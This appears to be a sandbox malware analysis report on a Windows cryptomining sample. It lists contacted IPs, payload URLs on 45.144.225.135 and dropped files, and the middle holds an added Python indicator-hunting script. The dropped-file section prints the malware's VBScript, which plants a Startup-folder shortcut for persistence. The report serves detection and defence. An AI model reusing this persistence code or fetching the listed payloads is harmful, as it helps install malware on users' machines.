                                                                                                                    • URL Reputation: safe
                                                                                                                    • URL Reputation: safe
                                                                                                                    • URL Reputation: safe
                                                                                                                    unknown
                                                                                                                    https://t0.ssl.ak.tiles.virtualearth.net/tiles/gensvchost.exe, 00000014.00000003.287575013.0000019DF3E31000.00000004.00000001.sdmpfalse
                                                                                                                      high
                                                                                                                      http://www.fontbureau.com/designers8P7Oa6i5muL.exe, 00000000.00000002.229315994.0000000005D50000.00000002.00000001.sdmpfalse
                                                                                                                        high
                                                                                                                        https://www.roblox.com/info/privacysvchost.exe, 00000019.00000003.332897282.0000024726963000.00000004.00000001.sdmp, svchost.exe, 00000019.00000003.332747633.000002472698E000.00000004.00000001.sdmpfalse
                                                                                                                          high
                                                                                                                          http://45.144.225.135/config.txtLP7Oa6i5muL.exe, 00000005.00000002.465658299.00000000010BA000.00000004.00000020.sdmpfalse
                                                                                                                          • Avira URL Cloud: safe
                                                                                                                          unknown
                                                                                                                          http://www.g5e.com/termsofservicesvchost.exe, 00000019.00000003.325656679.00000247269AC000.00000004.00000001.sdmpfalse
                                                                                                                            high
                                                                                                                            https://dynamic.api.tiles.ditu.live.com/odvs/gdv?pv=1&r=svchost.exe, 00000014.00000002.309851133.0000019DF3E5C000.00000004.00000001.sdmpfalse
                                                                                                                              high
                                                                                                                              https://activity.windows.comsvchost.exe, 00000010.00000002.461853027.0000017D01A3E000.00000004.00000001.sdmpfalse
                                                                                                                                high
                                                                                                                                https://dev.ditu.live.com/REST/v1/Locationssvchost.exe, 00000014.00000003.309277263.0000019DF3E60000.00000004.00000001.sdmpfalse
                                                                                                                                  high
                                                                                                                                  https://RtlGetVersionntdll.dllP7Oa6i5muL.exe, 00000000.00000002.219038679.0000000002FEF000.00000004.00000001.sdmpfalse
                                                                                                                                  • Avira URL Cloud: safe
                                                                                                                                  unknown
                                                                                                                                  https://%s.dnet.xboxlive.comsvchost.exe, 00000010.00000002.461853027.0000017D01A3E000.00000004.00000001.sdmpfalse
                                                                                                                                  • URL Reputation: safe
                                                                                                                                  • URL Reputation: safe
                                                                                                                                  • URL Reputation: safe
                                                                                                                                  low
                                                                                                                                  https://dynamic.api.tiles.ditu.live.com/odvs/gd?pv=1&r=svchost.exe, 00000014.00000003.309307335.0000019DF3E5A000.00000004.00000001.sdmpfalse
                                                                                                                                    high

Contacted IPs

Public

IP | Domain | Country | ASN | ASN Name | Malicious
144.217.14.139 | unknown | Canada | 16276 | OVHFR | true
45.144.225.135 | unknown | Netherlands | 35913 | DEDIPATH-LLCUS | false

Private

IP
192.168.2.1
127.0.0.1

General Information

Joe Sandbox Version: 33.0.0 White Diamond
Analysis ID: 448402
Start date: 14.07.2021
Start time: 07:03:10
Joe Sandbox Product: CloudBasic
Overall analysis duration: 0h 10m 42s
Hypervisor based Inspection enabled: false
Report type: full
Sample file name: P7Oa6i5muL (renamed file extension from none to exe)
Cookbook file name: default.jbs
Analysis system description: Windows 10 64 bit v1803 with Office Professional Plus 2016, Chrome 85, IE 11, Adobe Reader DC 19, Java 8 Update 211
Number of new started processes analysed: 30
Number of new started drivers analysed: 0
Number of existing processes analysed: 0
Number of existing drivers analysed: 0
Number of injected processes analysed: 0
Technologies:
• HCA enabled
• EGA enabled
• HDC enabled
• AMSI enabled
Analysis Mode: default
Analysis stop reason: Timeout
Detection: MAL
Classification: mal100.expl.evad.mine.winEXE@25/17@2/4
EGA Information: Failed
HDC Information:
• Successful, ratio: 7.3% (good quality ratio 6.3%)
• Quality average: 65.6%
• Quality standard deviation: 33.6%
HCA Information:
• Successful, ratio: 100%
• Number of executed functions: 187
• Number of non-executed functions: 52
Cookbook Comments:
• Adjust boot time
• Enable AMSI
Warnings:
• Excluded processes from analysis (whitelisted): taskhostw.exe, audiodg.exe, BackgroundTransferHost.exe, backgroundTaskHost.exe, UsoClient.exe, wuapihost.exe
• Excluded IPs from analysis (whitelisted): 52.255.188.83, 104.43.139.144, 168.61.161.212, 13.88.21.125, 23.54.113.53, 104.42.151.234, 20.50.102.62, 95.100.54.203, 20.54.104.15, 20.54.7.98, 40.112.88.60
• Excluded domains from analysis (whitelisted): store-images.s-microsoft.com-c.edgekey.net, fs-wildcard.microsoft.com.edgekey.net, fs-wildcard.microsoft.com.edgekey.net.globalredir.akadns.net, arc.msn.com, consumerrp-displaycatalog-aks2eap-europe.md.mp.microsoft.com.akadns.net, e12564.dspb.akamaiedge.net, arc.trafficmanager.net, displaycatalog.mp.microsoft.com, watson.telemetry.microsoft.com, prod.fs.microsoft.com.akadns.net, fs.microsoft.com, displaycatalog-rp-europe.md.mp.microsoft.com.akadns.net, ris-prod.trafficmanager.net, asf-ris-prod-neu.northeurope.cloudapp.azure.com, skypedataprdcolcus17.cloudapp.net, e1723.g.akamaiedge.net, skypedataprdcolcus16.cloudapp.net, consumerrp-displaycatalog-aks2aks-europe.md.mp.microsoft.com.akadns.net, iris-de-prod-azsc-uks.uksouth.cloudapp.azure.com, ris.api.iris.microsoft.com, skypedataprdcoleus17.cloudapp.net, store-images.s-microsoft.com, blobcollector.events.data.trafficmanager.net, skypedataprdcolwus15.cloudapp.net, skypedataprdcolwus16.cloudapp.net, displaycatalog-rp.md.mp.microsoft.com.akadns.net, neu-consumerrp-displaycatalog-aks2aks-europe.md.mp.microsoft.com.akadns.net
• Not all processes were analyzed; the report is missing behavior information
• Report size exceeded maximum capacity and may be missing behavior information
• Report size getting too big: too many NtAllocateVirtualMemory calls found
• Report size getting too big: too many NtProtectVirtualMemory calls found

Simulations

Behavior and APIs

Time | Type | Description
07:03:58 | API Interceptor | 1x Sleep call for process: P7Oa6i5muL.exe modified
07:04:24 | API Interceptor | 12x Sleep call for process: svchost.exe modified
07:04:34 | Autostart | Run: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\viTRMUuKeV.url
07:05:41 | API Interceptor | 1x Sleep call for process: MpCmdRun.exe modified
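The two public IPs in the Contacted IPs table and the .url file written to the per-user Startup folder (Behavior and APIs, 07:04:34) are the indicators a defender would take from this analysis. The script below is an added example and not part of the Joe Sandbox report: it runs those indicators over constructed proxy-log and file-event lines (the log formats, field order, client addresses and process names are assumptions, not data from this analysis) and returns the matches as structured hits rather than just printing them.

```python
import re
from dataclasses import dataclass
from typing import Iterable, List, Optional
from urllib.parse import urlsplit

# Network indicators from this report: the two public IPs the sample
# contacted, and the URL prefix of the host that served config.txt.
IOC_IPS = {"144.217.14.139", "45.144.225.135"}
IOC_URL_PREFIXES = ("http://45.144.225.135/",)

# Host indicator from the Behavior table: a .url file written to the
# per-user Startup folder (any name; the report's was viTRMUuKeV.url).
STARTUP_URL_RE = re.compile(
    r"\\Microsoft\\Windows\\Start Menu\\Programs\\Startup\\[^\\]+\.url$",
    re.IGNORECASE,
)

# Constructed proxy log lines (not from the report). Assumed format:
# <epoch> <client-ip> <method> <url-or-host:port> <status>
SAMPLE_PROXY_LOG = """\
1626246180 192.168.2.5 GET http://45.144.225.135/config.txt 200
1626246181 192.168.2.5 CONNECT 144.217.14.139:443 200
1626246182 192.168.2.7 GET https://www.roblox.com/info/privacy 200
1626246183 192.168.2.5 GET http://45.144.225.135/notepad.exe 200
"""

# Constructed file-creation events (not from the report). Assumed format:
# <time> <process> <path>   (process names are placeholders)
SAMPLE_FILE_EVENTS = """\
07:04:34 sample.exe C:\\Users\\user\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Startup\\viTRMUuKeV.url
07:04:35 explorer.exe C:\\Users\\user\\Documents\\notes.txt
"""


@dataclass(frozen=True)
class Hit:
    source: str      # "proxy" or "file"
    indicator: str   # which IOC matched
    reason: str
    line: str        # the raw event that matched


def host_of(target: str) -> Optional[str]:
    """Host part of a URL ('http://h/p') or of a CONNECT target ('h:port')."""
    if "://" in target:
        return urlsplit(target).hostname
    return target.rsplit(":", 1)[0] or None


def scan_proxy_log(lines: Iterable[str]) -> List[Hit]:
    """Match the URL prefixes first (most specific), then the bare IP set,
    so a config.txt fetch is reported as a URL hit rather than an IP hit."""
    hits: List[Hit] = []
    for raw in lines:
        parts = raw.split()
        if len(parts) < 4:
            continue          # malformed or empty line: skip rather than crash
        target = parts[3]
        prefix = next((p for p in IOC_URL_PREFIXES if target.startswith(p)), None)
        if prefix:
            hits.append(Hit("proxy", prefix, "URL on host that served config.txt", raw))
            continue
        host = host_of(target)
        if host in IOC_IPS:
            hits.append(Hit("proxy", host, "IP contacted by the sample", raw))
    return hits


def scan_file_events(lines: Iterable[str]) -> List[Hit]:
    """Flag any .url file created inside the per-user Startup folder."""
    hits: List[Hit] = []
    for raw in lines:
        parts = raw.split(maxsplit=2)   # path may contain spaces ("Start Menu")
        if len(parts) < 3:
            continue
        if STARTUP_URL_RE.search(parts[2]):
            hits.append(Hit("file", parts[2], ".url dropped in Startup folder", raw))
    return hits


def hunt(proxy_log: str = SAMPLE_PROXY_LOG, file_events: str = SAMPLE_FILE_EVENTS) -> List[Hit]:
    """Run both scanners and return every hit, proxy hits first."""
    return scan_proxy_log(proxy_log.splitlines()) + scan_file_events(file_events.splitlines())


if __name__ == "__main__":
    for h in hunt():
        print(f"[{h.source}] {h.reason}: {h.indicator}\n    {h.line}")
```

Two caveats when lifting indicators from this report. The URL string table shows the fetched URL as http://45.144.225.135/config.txtL; the trailing L is memory-dump residue, which is why the scanner matches on the host prefix instead of the literal string. And the Contacted IPs table marks 45.144.225.135 as Malicious: false while the Context section lists the same host serving config.txt, config2.txt, notepad.exe and conhost.exe to a long run of other samples, so the per-IP verdict is a reputation lookup and not a reason to drop that host from the hunt.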

Joe Sandbox View / Context

IPs

Match | Associated Sample Name / URL | Detection | Context
144.217.14.139 | 1fJCh9Qn75.exe | malicious |
144.217.14.139 | 73invoice #2307.exe | malicious |
45.144.225.135 | H9QnI1DbC1.exe | malicious | 45.144.225.135/config.txt
45.144.225.135 | 7xhLwiPIrR.exe | malicious | 45.144.225.135/notepad.exe
45.144.225.135 | qhgv3aRzkZ.exe | malicious | 45.144.225.135/conhost.exe
45.144.225.135 | zIrx1wUddJ.exe | malicious | 45.144.225.135/config.txt
45.144.225.135 | E91sLsvV8S.exe | malicious | 45.144.225.135/config.txt
45.144.225.135 | SecuriteInfo.com.Trojan.GenericKD.46284216.26505.exe | malicious | 45.144.225.135/notepad.exe
45.144.225.135 | notepad.exe | malicious | 45.144.225.135/notepad.exe
45.144.225.135 | taskhost.exe | malicious | 45.144.225.135/config2.txt
45.144.225.135 | csrss.exe | malicious | 45.144.225.135/notepad.exe
45.144.225.135 | notepad.exe | malicious | 45.144.225.135/config.txt
45.144.225.135 | RcyatUBgOo.exe | malicious | 45.144.225.135/notepad.exe
45.144.225.135 | 1fJCh9Qn75.exe | malicious | 45.144.225.135/notepad.exe
45.144.225.135 | xS9h6XCLaY.exe | malicious | 45.144.225.135/notepad.exe
45.144.225.135 | WHK1KXo5rL.exe | malicious | 45.144.225.135/notepad.exe
45.144.225.135 | ifulH09vsC.exe | malicious | 45.144.225.135/notepad.exe
                                                                                                                                        SecuriteInfo.com.Trojan.Siggen12.56619.6518.exeGet hashmaliciousBrowse
                                                                                                                                        • 45.144.225.135/notepad.exe
                                                                                                                                        SecuriteInfo.com.__vbaHresultCheckObj.21994.exeGet hashmaliciousBrowse
                                                                                                                                        • 45.144.225.135/config.txt
                                                                                                                                        SecuriteInfo.com.Trojan.Siggen12.45962.28547.exeGet hashmaliciousBrowse
                                                                                                                                        • 45.144.225.135/godeth.exe
                                                                                                                                        SecuriteInfo.com.Variant.Johnnie.321295.17359.exeGet hashmaliciousBrowse
                                                                                                                                        • 45.144.225.135/config.txt

Domains

Match | Associated Sample Name / URL | SHA 256 | Detection | Link | Context
xmr-us-east1.nanopool.org | H9QnI1DbC1.exe | Get hash | malicious | Browse | • 144.217.14.139
                          | 7xhLwiPIrR.exe | Get hash | malicious | Browse | • 142.44.243.6
                          | qhgv3aRzkZ.exe | Get hash | malicious | Browse | • 144.217.14.139
                          | zIrx1wUddJ.exe | Get hash | malicious | Browse | • 142.44.242.100
                          | E91sLsvV8S.exe | Get hash | malicious | Browse | • 142.44.243.6
                          | SecuriteInfo.com.Trojan.GenericKD.46284216.26505.exe | Get hash | malicious | Browse | • 144.217.14.109
                          | notepad.exe | Get hash | malicious | Browse | • 142.44.242.100
                          | csrss.exe | Get hash | malicious | Browse | • 144.217.14.109
                          | notepad.exe | Get hash | malicious | Browse | • 192.99.69.170
                          | RcyatUBgOo.exe | Get hash | malicious | Browse | • 144.217.14.109
                          | 1fJCh9Qn75.exe | Get hash | malicious | Browse | • 144.217.14.109
                          | xS9h6XCLaY.exe | Get hash | malicious | Browse | • 142.44.243.6
                          | 4FNTlzlu10.exe | Get hash | malicious | Browse | • 142.44.242.100
                          | 73invoice #2307.exe | Get hash | malicious | Browse | • 142.44.242.100

ASN

Match | Associated Sample Name / URL | SHA 256 | Detection | Link | Context
DEDIPATH-LLCUS | PO7581.exe | Get hash | malicious | Browse | • 45.15.143.171
               | CreditCardAuth.jar | Get hash | malicious | Browse | • 45.133.1.212
               | CreditCardAuth.jar | Get hash | malicious | Browse | • 45.133.1.212
               | Receipt09072021.jar | Get hash | malicious | Browse | • 45.133.1.212
               | Receipt09072021.jar | Get hash | malicious | Browse | • 45.133.1.212
               | Swift Payment Copy.exe | Get hash | malicious | Browse | • 74.201.28.104
               | H9QnI1DbC1.exe | Get hash | malicious | Browse | • 45.144.225.135
               | 7xhLwiPIrR.exe | Get hash | malicious | Browse | • 45.144.225.135
               | D6zIdvQnRQ.exe | Get hash | malicious | Browse | • 45.133.1.212
               | UPS_Doc203139.jar | Get hash | malicious | Browse | • 45.133.1.212
               | UPS_Doc203139.jar | Get hash | malicious | Browse | • 45.133.1.212
               | djBbDPfGV3.exe | Get hash | malicious | Browse | • 74.201.28.127
               | uXlQdzKw2Q.exe | Get hash | malicious | Browse | • 45.133.1.67
               | qhgv3aRzkZ.exe | Get hash | malicious | Browse | • 45.144.225.135
               | 13Izi42oYq.exe | Get hash | malicious | Browse | • 74.201.28.60
               | HmT3NS0FnD.exe | Get hash | malicious | Browse | • 45.133.1.67
               | BfdkXo6xoH.exe | Get hash | malicious | Browse | • 185.177.118.233
               | xnuE49NGol.exe | Get hash | malicious | Browse | • 185.177.118.233
               | HuPjcvVze1.exe | Get hash | malicious | Browse | • 45.15.170.116
               | zIrx1wUddJ.exe | Get hash | malicious | Browse | • 45.144.225.135
OVHFR          | TNT Shipping doc.exe | Get hash | malicious | Browse | • 167.114.179.8
               | CARGOS10029032.vbs | Get hash | malicious | Browse | • 167.114.22.12
               | rz89FRwKvB.exe | Get hash | malicious | Browse | • 178.33.222.243
               | Qoxd7fpbvy.exe | Get hash | malicious | Browse | • 137.74.76.180
               | ohSTDjgBHr.doc | Get hash | malicious | Browse | • 54.38.220.85
               | ohSTDjgBHr.doc | Get hash | malicious | Browse | • 54.38.220.85
               | ohSTDjgBHr.doc | Get hash | malicious | Browse | • 54.38.220.85
               | Omk46bhBvk.exe | Get hash | malicious | Browse | • 94.23.247.226
               | PO No. JTL-009-2021-07.exe | Get hash | malicious | Browse | • 192.99.153.170
               | 1ozUQfU7uo.exe | Get hash | malicious | Browse | • 37.59.103.148
               | Pay Slip- No-$142,851.53.html | Get hash | malicious | Browse | • 145.239.131.51
               | ALGJU8LLCKYM5SN.EXE | Get hash | malicious | Browse | • 51.195.43.214
               | ADI INV-RECON #_891976.html | Get hash | malicious | Browse | • 145.239.131.51
               | 1BhmQQkiR5BrTs5yBLUVwWjLMfQhv4xjUX.jar | Get hash | malicious | Browse | • 158.69.53.93
               | Order_1537-25.exe | Get hash | malicious | Browse | • 51.75.128.155
               | Uar3K96M3X.exe | Get hash | malicious | Browse | • 54.37.106.167
               | UAbXH2SmaO.exe | Get hash | malicious | Browse | • 54.37.106.167
               | 998h1TUZsk.exe | Get hash | malicious | Browse | • 51.91.76.59
               | 1624980449.5267825.dll | Get hash | malicious | Browse | • 51.81.224.98
               | GJYPoFf5AE.exe | Get hash | malicious | Browse | • 54.37.106.167

JA3 Fingerprints

No context

Dropped Files

No context

Created / dropped Files

C:\ProgramData\LKBNMTFJgl\cfg
Process: C:\Users\user\AppData\Local\Temp\P7Oa6i5muL.exe
File Type: ASCII text, with very long lines, with no line terminators
Category: dropped
Size (bytes): 2140
Entropy (8bit): 5.557738244951003
Encrypted: false
SSDEEP: 48:lCHUL3qQEzCmini9iqvciaXkih9icue6bhvYbUbo:EH9QWv/ih9Tue6ybUE
MD5: 2DE48065534A637941090D8F3E04044F
SHA1: EEAB2C38DD711A9BADB8265E11963732EA9C84DB
SHA-256: 8ABF520009CEA0E0C1B67563FD89C4C0E0403744942763D843E39EED180A1ED7
SHA-512: 2D1466D5F09DF4F6628092A2D7D210728536A1649CFECAE362D907D61088E32574290A350848F161C67FE008B2E46864161134C63560763BE932C3A631A24DC1
Malicious: false
C:\ProgramData\LKBNMTFJgl\cfgi
Process: C:\Users\user\AppData\Local\Temp\P7Oa6i5muL.exe
File Type: ASCII text, with very long lines, with no line terminators
Category: dropped
Size (bytes): 2140
Entropy (8bit): 5.5574864173164125
Encrypted: false
SSDEEP: 48:lCHUL3qQEzlmini9iqvciaXkih9icue6bhvYbUbo:EH9QZv/ih9Tue6ybUE
MD5: 6CAEE3EB287981EC875E5AD3B85DBA1D
SHA1: 665E6F0252A71C6AA31A7FBCE07D9301182953C5
SHA-256: 4DD2C67C3EF1DE5A70FE97123AA01C2D7FEAFB96F079EF2DE0E64CB9D73A54A8
SHA-512: B6C71536CC290FFE07F1638ED99588CBB8C78997A72CCDF0D8E9059D8D4C932CB8E5195F06A42DF2CBACFE650C9A4CD1616DE30D03DC947E2902C103C4A7E6B8
Malicious: false
C:\ProgramData\LKBNMTFJgl\csrss
Process: C:\Users\user\AppData\Local\Temp\P7Oa6i5muL.exe
File Type: PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
Category: dropped
Size (bytes): 2241536
Entropy (8bit): 7.994950828794957
Encrypted: true
SSDEEP: 49152:7wFpwLN5DX5ecu7O4jrimxMHDUrY+BPOIz8uJxLWuXoK:8wLf8qHa1eunvXoK
MD5: 9DBCF183762872D8917B8A19535A0C65
SHA1: 94D27127F8FFBEBEC6AD803599ED3C0477A15E3C
SHA-256: 759D3E20098353E73C0C417ECF755A3AB24CDF7EAD10DF8C5A4AAB549D7423F2
SHA-512: CD3FB751C0360DF6865633D72633403C0802153727FE75951E842227B4237970DF999229C73D1E94D9E0F0B0442EC58EC59024836EBEF3F7605254BC6A4F82B6
Malicious: true
Antivirus:
• Antivirus: ReversingLabs, Detection: 21%
                                                                                                                                        Preview: MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....BT...............0... .........F. .. .... ...@.. ........................"...........@................................... .O..... ......................."...... .............................................. ............... ..H............text...L. .. .... ................. ..`.rsrc......... ....... .............@..@.reloc........"......2".............@..B................(. .....H........2...#......8....V...O ..........................................*.*.*..(....*..(....*..(....*.*.*.*..(....*..(....*..(....*.*.*.*..(....*..(....*..(....*..{....*"..}....*..(....*..{....*"..}....*..(....*.0..)........{.........(....t......|......(...+...3.*....0..)........{.........(....t......|......(...+...3.*.s....r...p(....o....(......o....*..{....,..{.....s....%.o....o....*..(....*....0..G........(......+-~....%-.&~......K...s....%.....s....(......X....2. .U..( .
C:\ProgramData\LKBNMTFJgl\e9c1286a28_3.1.0
Process: C:\Users\user\AppData\Local\Temp\P7Oa6i5muL.exe
File Type: data
Category: dropped
Size (bytes): 3272
Entropy (8bit): 3.5391176048802047
Encrypted: false
                                                                                                                                        SSDEEP:24:PnPWWWWWWWWWWciWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWr:0wfIa
                                                                                                                                        MD5:97336FD69071FE322CC57F730C0EA273
                                                                                                                                        SHA1:97C86F938D64DD5EB84BDD6D0C16AC73B0762590
                                                                                                                                        SHA-256:F5C9FAF94FDBE5C9317FC89D5536B1CF3D0520EFB17A504DD9AA0E15F9607CF6
                                                                                                                                        SHA-512:160225663F7EC8D181AD5DC4E51ADE2E1AAE76B6D456B17B68E6E1D340290A21AF000CA297ED298C7D6B7B12DB8679EA81AA90EEDF2D92017E8C2CA93D289ADC
                                                                                                                                        Malicious:false
                                                                                                                                        C:\ProgramData\LKBNMTFJgl\r.vbs
                                                                                                                                        Process:C:\Users\user\AppData\Local\Temp\P7Oa6i5muL.exe
                                                                                                                                        File Type:data
                                                                                                                                        Category:dropped
                                                                                                                                        Size (bytes):652
                                                                                                                                        Entropy (8bit):3.6256011936570958
                                                                                                                                        Encrypted:false
                                                                                                                                        SSDEEP:12:DJhvugypjBQMyol3qMJsW+jCRAbjMwCdKIiDHvhFkqy30mgZM3LCKKvbMX4FHkqc:DJhLStyjCyjMKFNyEmgZMbaDMoFHNc
                                                                                                                                        MD5:8EC848878E04E0B80C90077A0AA76AF6
                                                                                                                                        SHA1:BF2FAA04A37B4CC49E48808D7584B02A35C53D5A
                                                                                                                                        SHA-256:24EEFD5A0A5E3C019A44AA704F1560DB35E59CB36E0270A389D55E35DFF11F1F
                                                                                                                                        SHA-512:486DFA27D1A54E3EF5A2B9EABA76CE74FEE9045C75D8B4EBFF2DF3966AB833C02139EED8B9EA9C2B32AB77B6D9D2F0FAC6FC4A9B661AF825EB36AA43C71C63AA
                                                                                                                                        Malicious:true
                                                                                                                                        Preview: Set objFSO=CreateObject("Scripting.FileSystemObject")
                                                                                                                                        outFile="C:\Users\hardz\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\viTRMUuKeV.url"
                                                                                                                                        Set objFile = objFSO.CreateTextFile(outFile,True)
                                                                                                                                        objFile.Write "[InternetShortcut]" & vbCrLf & "URL=""file:///C:\ProgramData\LKBNMTFJgl\csrss.exe"""
                                                                                                                                        objFile.Close
                                                                                                                                        C:\ProgramData\Microsoft\Network\Downloader\edb.log
                                                                                                                                        Process:C:\Windows\System32\svchost.exe
                                                                                                                                        File Type:data
                                                                                                                                        Category:dropped
                                                                                                                                        Size (bytes):4096
                                                                                                                                        Entropy (8bit):0.5943821504566759
                                                                                                                                        Encrypted:false
                                                                                                                                        SSDEEP:6:0F2A/ek1GaD0JOCEfMuaaD0JOCEfMKQmDfAl/gz2cE0fMbhEZolrRSQ2hyYIIT:04A/NGaD0JcaaD0JwQQfAg/0bjSQJ
                                                                                                                                        MD5:15163B4DCEC767FE2A39672AD17D614F
                                                                                                                                        SHA1:E435F1D8CC17D1D96F72B9B011C48E8E76366649
                                                                                                                                        SHA-256:9DDCCC4ACF8924851DDE42C3BBD01E4A453C6CAFAF47F60A0821B72E4623CDA8
                                                                                                                                        SHA-512:0A9F79ED9693ED5493098D69A2355498F829E3F74C57CA5362A676577FDB2F97D4D8A02CDD0C50F00D812AE37BB5D2095E0942B34054B0F82606D21E60756727
                                                                                                                                        Malicious:false
                                                                                                                                        C:\ProgramData\Microsoft\Network\Downloader\qmgr.db
                                                                                                                                        Process:C:\Windows\System32\svchost.exe
                                                                                                                                        File Type:Extensible storage engine DataBase, version 0x620, checksum 0x304c9aab, page size 16384, DirtyShutdown, Windows version 10.0
                                                                                                                                        Category:dropped
                                                                                                                                        Size (bytes):32768
                                                                                                                                        Entropy (8bit):0.09587280019020472
                                                                                                                                        Encrypted:false
                                                                                                                                        SSDEEP:12:mG0+Iie1O4bltrivqKAG0+Iie1O4bltrivqK:Kz1m+z1m
                                                                                                                                        MD5:5E6A0BF8B8E67A9796B8E1BD440D0D2A
                                                                                                                                        SHA1:8C21B11FB12428069ACAAF089DD850CB03395249
                                                                                                                                        SHA-256:3846F46D21DB2F88487B4144D55A4E9CFB1CA1597F0C6E8C4F35494D4E49D5AF
                                                                                                                                        SHA-512:C64634777C52DB1509A8561E8BFB7DA663C460F1EAFDA7BC25E2CDB75E388C797742FA6B3F4144FB22CD02E23A1AECCCD53C941320BF1892F06C5F55A261E3B3
                                                                                                                                        Malicious:false
                                                                                                                                        C:\ProgramData\Microsoft\Network\Downloader\qmgr.jfm
                                                                                                                                        Process:C:\Windows\System32\svchost.exe
                                                                                                                                        File Type:data
                                                                                                                                        Category:dropped
                                                                                                                                        Size (bytes):8192
                                                                                                                                        Entropy (8bit):0.11134254793031642
                                                                                                                                        Encrypted:false
                                                                                                                                        SSDEEP:3:Ij17Ev9btjXl/bJdAtizz9ric+lill:Ipidt7t4U9rivG
                                                                                                                                        MD5:D2E4D6910C3A7DB1082A4BF160EC71CB
                                                                                                                                        SHA1:F2E6E8A541A655EDED45A18657770BBC3C1E7058
                                                                                                                                        SHA-256:F47D206380438278361A68D8911CD63F4055CDE0E9385C3A85888BE9D17F41D7
                                                                                                                                        SHA-512:804B4D8D20774379B499D4B688C8E3506CB1E3F0EB80C655F7C74D96063F4CB9645548EB884292F641751960979DCC3D3CAF5B324756133B364CD10830EA42D0
                                                                                                                                        Malicious:false
                                                                                                                                        C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\P7Oa6i5muL.exe.log
                                                                                                                                        Process:C:\Users\user\Desktop\P7Oa6i5muL.exe
                                                                                                                                        File Type:ASCII text, with CRLF line terminators
                                                                                                                                        Category:modified
                                                                                                                                        Size (bytes):1299
                                                                                                                                        Entropy (8bit):5.353835388147306
                                                                                                                                        Encrypted:false
                                                                                                                                        SSDEEP:24:MLUE4K5E4Ks2E1qE4qXKDE4KhK3VZ9pKhPKIE4oKFKHKoZAE4Kzr7FE4xLE4qE4j:MIHK5HKXE1qHiYHKhQnoPtHoxHhAHKzg
                                                                                                                                        MD5:D7428B0428DC5FA72A41122D265CFA0E
                                                                                                                                        SHA1:F485E2EC6F980F218063AF527724C088617B3B94
                                                                                                                                        SHA-256:C49B31FB28F5EC1B5A82D45DF4A0A88DBC26E468BA007D8E63C800BA69CC5FFC
                                                                                                                                        SHA-512:FD5BC965FD28DC219F2703726A34A7156D1B71B9199617136F936DD5DDBB2CA65175FBB4B761243635493D6CABE3069406B4D4473DEEB93FDCDA1F392345683B
                                                                                                                                        Malicious:true
                                                                                                                                        Preview: 1,"fusion","GAC",0..1,"WinRT","NotApp",1..2,"System.Windows.Forms, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089",0..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System\4f0a7eefa3cd3e0ba98b5ebddbbc72e6\System.ni.dll",0..2,"System.Drawing, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a",0..3,"System.Core, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Core\f1d8480152e0da9a60ad49c6d16a3b6d\System.Core.ni.dll",0..3,"System.Configuration, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Configuration\8d67d92724ba494b6c7fd089d6f25b48\System.Configuration.ni.dll",0..3,"System.Xml, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Xml\b219d4630d26b88041b59c21
                                                                                                                                        C:\Users\user\AppData\Local\Packages\ActiveSync\LocalState\DiagOutputDir\SyncVerbose.etl
                                                                                                                                        Process:C:\Windows\System32\svchost.exe
                                                                                                                                        File Type:data
                                                                                                                                        Category:dropped
                                                                                                                                        Size (bytes):65536
                                                                                                                                        Entropy (8bit):0.11019582103530898
                                                                                                                                        Encrypted:false
                                                                                                                                        SSDEEP:12:26koXm/Ey6q9995Rixnq3qQ10nMCldimE8eawHjcH:26kZl68sqLyMCldzE9BHjcH
                                                                                                                                        MD5:1637C0E46D3E4CC6E3590F1A58D74D71
                                                                                                                                        SHA1:74E8849D3B1118B9FD8230187A2772FB3947AF5B
                                                                                                                                        SHA-256:21E2219750F653C2B6628B0F1C4D24AE09C7E347CB5ECC7996105A48683EF047
                                                                                                                                        SHA-512:828D226485F6000F6397F37441F384708122F568A566717622DEA1A72259969B69933B6413B518DC0BD33115C4240BB87BE590A402B60D90C013CF144E5A7461
                                                                                                                                        Malicious:false
                                                                                                                                        C:\Users\user\AppData\Local\Packages\ActiveSync\LocalState\DiagOutputDir\UnistackCircular.etl
                                                                                                                                        Process:C:\Windows\System32\svchost.exe
                                                                                                                                        File Type:data
                                                                                                                                        Category:dropped
                                                                                                                                        Size (bytes):65536
                                                                                                                                        Entropy (8bit):0.11282319316751449
                                                                                                                                        Encrypted:false
                                                                                                                                        SSDEEP:12:AnpYVXm/Ey6q9995RivW1miM3qQ10nMCldimE8eawHza1miI9N:YpY4l6831tMLyMCldzE9BHza1tI9N
                                                                                                                                        MD5:3CA74F29176125DA9D8672B5A7A6686B
                                                                                                                                        SHA1:6059DDFAF9A43B0EFDEA1DD79DC1F583E5932C75
                                                                                                                                        SHA-256:6A1F04E9D55A3888FF40056F37D146B515BAFCE457D8A404219360A43E89D81A
                                                                                                                                        SHA-512:0F21B8C545FE098C550114C1A217A49CC0F070FFBB4772DA35DD205D1B82197D4D1995BFC8C73DB10F17C3D7086F293FEFFC81D6E7F4D7C301CFD4EBDCF66705
                                                                                                                                        Malicious:false
                                                                                                                                        C:\Users\user\AppData\Local\Packages\ActiveSync\LocalState\DiagOutputDir\UnistackCritical.etl
                                                                                                                                        Process:C:\Windows\System32\svchost.exe
                                                                                                                                        File Type:data
                                                                                                                                        Category:dropped
                                                                                                                                        Size (bytes):65536
                                                                                                                                        Entropy (8bit):0.11279089183546652
                                                                                                                                        Encrypted:false
